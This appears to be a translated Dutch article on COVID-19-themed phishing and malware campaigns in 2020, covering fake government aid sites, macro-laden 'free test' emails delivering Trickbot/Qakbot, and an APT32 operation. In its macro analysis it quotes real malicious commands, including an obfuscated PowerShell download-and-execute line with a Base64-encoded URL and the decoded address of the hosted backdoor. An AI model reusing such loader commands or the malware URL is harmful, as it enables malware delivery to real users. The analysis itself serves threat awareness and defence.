Aanvallers blijven het COVID-19-onderwerp exploiteren en creëren steeds meer bedreigingen voor gebruikers die zeer geïnteresseerd zijn in alles wat met de epidemie te maken heeft. IN We hebben al gesproken over welke soorten malware er zijn verschenen in de nasleep van het coronavirus, en vandaag zullen we het hebben over social engineering-technieken die gebruikers in verschillende landen, waaronder Rusland, al zijn tegengekomen. Algemene trends en voorbeelden worden onder de loep genomen.
Onthoud binnen We hadden het over het feit dat mensen niet alleen willen lezen over het coronavirus en het verloop van de epidemie, maar ook over financiële steunmaatregelen? Hier is een goed voorbeeld. In de Duitse deelstaat Noordrijn-Westfalen of NRW werd een interessante phishing-aanval ontdekt. De aanvallers hebben kopieën gemaakt van de website van het Ministerie van Economische Zaken (), waar iedereen financiële steun kan aanvragen. Zo'n programma bestaat echt en het bleek gunstig te zijn voor oplichters. Nadat ze de persoonlijke gegevens van hun slachtoffers hadden ontvangen, dienden ze een aanvraag in op de website van het echte ministerie, maar gaven ze andere bankgegevens op. Volgens officiële gegevens zijn er vierduizend van dergelijke valse verzoeken gedaan totdat het plan werd ontdekt. Als gevolg hiervan viel 4 miljoen dollar, bestemd voor getroffen burgers, in handen van fraudeurs.
Wilt u een gratis test op COVID-19?
Een ander belangrijk voorbeeld van phishing met coronavirusthema was in e-mails. De berichten trokken de aandacht van gebruikers met een aanbod om gratis te testen op besmetting met het coronavirus. In de bijlage hiervan er waren gevallen van Trickbot/Qakbot/Qbot. En toen degenen die hun gezondheid wilden controleren ‘het bijgevoegde formulier begonnen in te vullen’, werd een kwaadaardig script naar de computer gedownload. En om sandbox-tests te voorkomen, begon het script het hoofdvirus pas na enige tijd te downloaden, toen de beveiligingssystemen ervan overtuigd waren dat er geen kwaadaardige activiteit zou plaatsvinden.
Het overtuigen van de meeste gebruikers om macro's in te schakelen was ook eenvoudig. Hiervoor werd een standaardtruc gebruikt: om de vragenlijst in te vullen, moet je eerst macro's inschakelen, wat betekent dat je een VBA-script moet draaien.
Zoals u kunt zien, wordt het VBA-script speciaal gemaskeerd tegen antivirusprogramma's.
Windows heeft een wachtfunctie waarbij de toepassing /T <seconden> wacht voordat het standaardantwoord “Ja” wordt geaccepteerd. In ons geval wachtte het script 65 seconden voordat tijdelijke bestanden werden verwijderd:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
En terwijl we wachtten, werd er malware gedownload. Hiervoor is een speciaal PowerShell-script gelanceerd:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Na het decoderen van de Base64-waarde downloadt het PowerShell-script de achterdeur op de eerder gehackte webserver uit Duitsland:
http://automatischer-staubsauger.com/feature/777777.pngen slaat het op onder de naam:
C:UsersPublictmpdirfile1.exe
Map ‘C:UsersPublictmpdir’ wordt verwijderd bij het uitvoeren van het bestand 'tmps1.bat' dat de opdracht bevat cmd /c mkdir ""C:UsersPublictmpdir"".
Gerichte aanval op overheidsinstanties
Bovendien rapporteerden FireEye-analisten onlangs een gerichte APT32-aanval gericht op overheidsstructuren in Wuhan, evenals op het Chinese Ministerie van Noodbeheer. Eén van de gedistribueerde RTF's bevatte een link naar een artikel in de New York Times met de titel . Bij het lezen ervan werd echter malware gedownload (FireEye-analisten identificeerden het exemplaar als METALJACK).
Interessant is dat op het moment van detectie geen van de antivirussen dit exemplaar heeft gedetecteerd, aldus Virustotal.
Wanneer officiële websites offline zijn
Het meest opvallende voorbeeld van een phishing-aanval vond onlangs plaats in Rusland. Aanleiding hiervoor was de invoering van een langverwachte uitkering voor kinderen van 3 tot en met 16 jaar. Toen op 12 mei 2020 de start van het accepteren van aanvragen werd aangekondigd, haastten miljoenen zich naar de website van de Staatsdiensten voor de langverwachte hulp en brachten het portaal niet erger dan een professionele DDoS-aanval plat. Toen de president zei dat “de overheidsdiensten de stroom aanvragen niet aankonden”, begonnen mensen online te praten over de lancering van een alternatieve site voor het accepteren van aanvragen.
Het probleem is dat verschillende sites tegelijk begonnen te werken, en terwijl één, de echte op posobie16.gosuslugi.ru, daadwerkelijk applicaties accepteert, meer .
Collega's van SearchInform vonden ongeveer 30 nieuwe frauduleuze domeinen in de .ru-zone. Infosecurity en Softline Company hebben sinds begin april meer dan zeventig vergelijkbare nepwebsites van overheidsdiensten gevolgd. Hun makers manipuleren bekende symbolen en gebruiken ook combinaties van de woorden gosuslugi, gosuslugi-70, vyplaty, covid-vyplaty, posobie, enzovoort.
Hype en social engineering
Al deze voorbeelden bevestigen alleen maar dat aanvallers met succes geld verdienen aan het onderwerp coronavirus. En hoe hoger de sociale spanning en hoe onduidelijker de kwesties, hoe groter de kans dat oplichters belangrijke gegevens stelen, mensen dwingen zelf hun geld op te geven of simpelweg meer computers hacken.
En aangezien de pandemie potentieel onvoorbereide mensen heeft gedwongen massaal thuis te werken, lopen niet alleen persoonlijke gegevens, maar ook bedrijfsgegevens gevaar. Zo werden onlangs ook Microsoft 365 (voorheen Office 365)-gebruikers het slachtoffer van een phishing-aanval. Mensen ontvingen massaal ‘gemiste’ gesproken berichten als bijlagen bij brieven. De bestanden waren echter feitelijk een HTML-pagina waar de slachtoffers van de aanval naartoe werden gestuurd . Als gevolg hiervan ontstaat verlies van toegang en compromittering van alle gegevens uit het account.
Bron: www.habr.com